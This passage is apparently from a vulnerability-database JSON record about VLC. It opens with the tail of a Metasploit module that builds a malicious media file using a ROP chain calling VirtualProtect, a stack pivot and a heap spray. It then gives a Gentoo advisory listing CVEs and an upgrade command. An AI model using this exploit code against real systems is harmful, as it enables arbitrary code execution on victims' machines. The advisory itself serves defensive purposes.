ESI contains\n # 0x030b030a, which will point to one of our \"pop; retn\"\n # pointers, so this works as both a pivot and NOPsled\n block = [\n rop_base + 0x229a5,\t\t# xcgh esi,esp; retn\n rop_base + 0x2c283,\t\t# pop eax; retn\n 0xdeadbeef,\t\t\t# pad\n rop_base + 0x2c283,\t\t# pop eax; retn\n ]\n block = block.pack('V*')\n\n # ROP payload\n rop = [\n rop_base + 0x1022,\t\t# retn\n\n # Call VirtualProtect()\n rop_base + 0x2c283,\t\t# pop eax; retn\n rop_base + 0x1212a4,\t\t# IAT entry for VirtualProtect -> eax\n rop_base + 0x12fda,\t\t# mov eax,DWORD PTR [eax]\n rop_base + 0x29d13,\t\t# jmp eax\n\n rop_base + 0x1022,\t\t# retn\n spray & ~0xfff,\t\t\t# lpAddress\n 0x60000,\t\t\t# dwSize\n 0x40,\t\t\t\t# flNewProtect\n spray - 0x1000,\t\t\t# lpfOldProtect\n\n # Enough of this ROP business...\n rop_base + 0xdace8 # push esp; retn\n ]\n rop = rop.pack('V*')\n\n # Overwrite the bad pointer with the address of an infinite\n # loop so the other threads spin instead of crashing\n rop << \"\\xc7\\x05\"\n rop << [spray + 0xc].pack('V')\n rop << [rop_base + 0x1c070].pack('V')\t# mov DWORD PTR ds:[ptr],&loop\n\n # Restore the stack\n rop << \"\\x87\\xe6\"\t\t\t# xchg esi,esp\n\n # Payload\n rop << payload.encoded\n\n # We need to be 16-byte aligned\n rop << \"\\xcc\" * (16 - rop.length % 16)\n\n # Heapspray and payload, go!\n 32.times {\n 0x3000.times {\n file << block\n }\n file << rop\n }\n\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n\n file_create(file)\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/vlc_webm.rb"}], "gentoo": [{"lastseen": "2016-09-06T19:46:06", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1684", "CVE-2011-0522", "CVE-2012-3377", "CVE-2011-2194", "CVE-2013-1954", "CVE-2010-3124", "CVE-2011-0531", "CVE-2010-1441", "CVE-2012-1775", "CVE-2011-2588", "CVE-2013-1868", "CVE-2010-3275", 
"CVE-2010-1442", "CVE-2013-6283", "CVE-2011-3623", "CVE-2010-3907", "CVE-2010-2937", "CVE-2011-0021", "CVE-2012-2396", "CVE-2011-1087", "CVE-2013-6934", "CVE-2012-0023", "CVE-2012-5855", "CVE-2012-5470", "CVE-2010-1443", "CVE-2013-4388", "CVE-2012-1776", "CVE-2010-3276", "CVE-2010-1445", "CVE-2013-3245", "CVE-2011-2587", "CVE-2010-1444", "CVE-2010-2062"], "description": "### Background\n\nVLC is a cross-platform media player and streaming server.\n\n### Description\n\nMultiple vulnerabilities have been discovered in VLC. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted media file using VLC, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll VLC users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-video/vlc-2.1.2\"", "edition": 1, "modified": "2014-11-05T00:00:00", "published": "2014-11-05T00:00:00", "id": "GLSA-201411-01", "href": "https://security.gentoo.org/glsa/201411-01", "type": "gentoo", "title": "VLC: Multiple vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}